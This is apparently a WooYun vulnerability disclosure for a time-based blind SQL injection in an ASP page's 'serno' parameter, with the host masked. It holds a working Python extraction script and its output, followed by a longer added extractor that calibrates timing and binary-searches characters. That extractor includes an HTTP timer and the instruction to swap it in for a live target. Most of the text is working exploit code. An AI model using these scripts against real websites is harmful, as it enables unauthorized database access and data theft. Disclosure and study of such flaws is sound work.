WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-01-19: Details sent to the vendor, awaiting the vendor's handling
2016-01-22: Vendor confirmed the issue; details visible to the vendor only
2016-02-01: Details disclosed to core white hats and relevant domain experts
2016-02-11: Details disclosed to regular white hats
2016-02-21: Details disclosed to intern white hats
2016-03-06: Details disclosed to the public
Injection point:
http://**.**.**.**/board/info/info_dtl.asp?dept_code=0000&serno=1192
The serno parameter is injectable: with "and 1=1" appended the page returns normally; with a single quote or "and 1=2" appended it returns an error page. Test script attached:
import requests
import time

# Candidate characters tried at each position (the original string skipped 'j'; fixed here)
payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@_.'
# Base URL without serno: the original kept serno=1192 in the URL and also passed serno
# via params, so the injected value was sent as a duplicate query parameter
url = 'http://**.**.**.**/board/info/info_dtl.asp?dept_code=0000'
user = ''
print('Start to retrieve MySQL user:')
for i in range(1, 23):
    for payload in payloads:
        starttime = time.time()
        # Time-based blind check: the server sleeps only when the i-th character of user()
        # equals the candidate. The original used sleep(1) against a 2 s threshold, so a
        # merely slow response could count as a hit; sleep(3) leaves a 1 s margin.
        s = "1192 and if(ascii(mid(user() from (%s) for 1))=%s,sleep(3),1)" % (i, ord(payload))
        param = {'serno': s}
        response = requests.get(url, params=param)
        if time.time() - starttime > 2:
            user += payload
            print('\n user is:', user, end='')
            break
        else:
            print('.', end='')
print('\n[Done] mysql user is %s' % user)
Results for reference only (script output; the progress dots printed between candidates are omitted):
user is: E
user is: Eb
user is: EbE
user is: EbEI
user is: EbEIC
user is: EbEICA
user is: EbEICAA
user is: EbEICAAD
user is: EbEICAADI
user is: EbEICAADIQ
user is: EbEICAADIQB
user is: EbEICAADIQBP
user is: EbEICAADIQBPK
user is: EbEICAADIQBPKL
user is: EbEICAADIQBPKLE
user is: EbEICAADIQBPKLEJ
user is: EbEICAADIQBPKLEJX
user is: EbEICAADIQBPKLEJXB
user is: EbEICAADIQBPKLEJXBL
user is: EbEICAADIQBPKLEJXBLN
user is: EbEICAADIQBPKLEJXBLNE
user is: EbEICAADIQBPKLEJXBLNEA
[Done] mysql user is EbEICAADIQBPKLEJXBLNEA
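The report's script tries every candidate character in turn and treats any response slower than a fixed 2 s as a hit, which is why the extracted name above reads like noise rather than a MySQL account name. The following is an added example (not code from the report or its author) of a more reliable time-based extractor for the same kind of injection point: it calibrates a latency baseline against an always-false condition, binary-searches each character's ASCII code with 7 queries instead of up to 65, and re-queries positives before accepting them. The HTTP URL, parameter name and base value used by make_http_timer are placeholders, and SimulatedTarget with its secret is constructed so the code runs offline:

```python
import random
import re
import time
import urllib.parse
import urllib.request

# MySQL expression for the ASCII code of character `pos` of `expr`
# (equivalent to the report's mid(user() from pos for 1)); ascii('') is 0 past the end.
CHAR_EXPR = "ascii(substring(({expr}),{pos},1))"


def make_http_timer(url, param, base_value, timeout=60):
    """Timer for a real target: round-trip seconds for one injected fragment.
    url/param/base_value are hypothetical, e.g. ('http://host/info_dtl.asp', 'serno', '1192')."""
    def timer(fragment):
        query = urllib.parse.urlencode({param: "%s %s" % (base_value, fragment)})
        start = time.monotonic()
        try:
            urllib.request.urlopen("%s?%s" % (url, query), timeout=timeout).read()
        except Exception:
            pass  # an error page still carries the timing signal
        return time.monotonic() - start
    return timer


class SimulatedTarget:
    """Constructed stand-in for the vulnerable page so the extractor runs offline: evaluates
    the generated condition against a made-up secret and returns a fake latency (no sleeping)."""
    def __init__(self, secret, delay, seed=0):
        self.secret, self.delay = secret, delay
        self.rng = random.Random(seed)
        self.queries = 0

    def __call__(self, fragment):
        self.queries += 1
        cond = re.fullmatch(r"and if\((.+),sleep\(\d+\),0\)", fragment).group(1)
        latency = 0.05 + self.rng.random() * 0.3          # baseline jitter, 0.05..0.35 s
        return latency + (self.delay if self._true(cond) else 0)

    def _true(self, cond):
        if cond == "1=2":
            return False
        m = re.fullmatch(r"ascii\(substring\(\((.+)\),(\d+),1\)\)>(\d+)", cond)
        pos, n = int(m.group(2)), int(m.group(3))
        code = ord(self.secret[pos - 1]) if pos <= len(self.secret) else 0
        return code > n


def make_timing_oracle(timer, delay=3, samples=5, confirm=True):
    """Calibrate against an always-false condition, then answer SQL conditions as True/False.
    Positives are re-queried once (confirm) because a slow response alone looks like sleep()."""
    false_fragment = "and if(1=2,sleep(%d),0)" % delay
    baseline = max(timer(false_fragment) for _ in range(samples))
    threshold = baseline + delay / 2.0

    def oracle(cond):
        fragment = "and if(%s,sleep(%d),0)" % (cond, delay)
        if timer(fragment) <= threshold:
            return False
        return timer(fragment) > threshold if confirm else True
    return oracle


def extract_string(oracle, expr, max_len=64):
    """Binary-search each character's ASCII code (7 oracle queries per character)."""
    out = []
    for pos in range(1, max_len + 1):
        char = CHAR_EXPR.format(expr=expr, pos=pos)
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("%s>%d" % (char, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # ascii('') == 0: past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    # Offline demonstration with a constructed secret; swap in make_http_timer(...) for a live target
    target = SimulatedTarget("app_user@localhost", delay=3, seed=1)
    oracle = make_timing_oracle(target, delay=3)
    print("user() =", extract_string(oracle, "user()"), "after", target.queries, "requests")
```

Against a live target, replace SimulatedTarget with make_http_timer(...) and pick a delay that comfortably exceeds the measured baseline; the confirm step roughly doubles the cost of true positives but removes the single-slow-response false hits that produced the noisy result above.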
Severity: High
Vulnerability Rank: 17
Confirmed: 2016-01-22 00:06
Thanks for the report.
None yet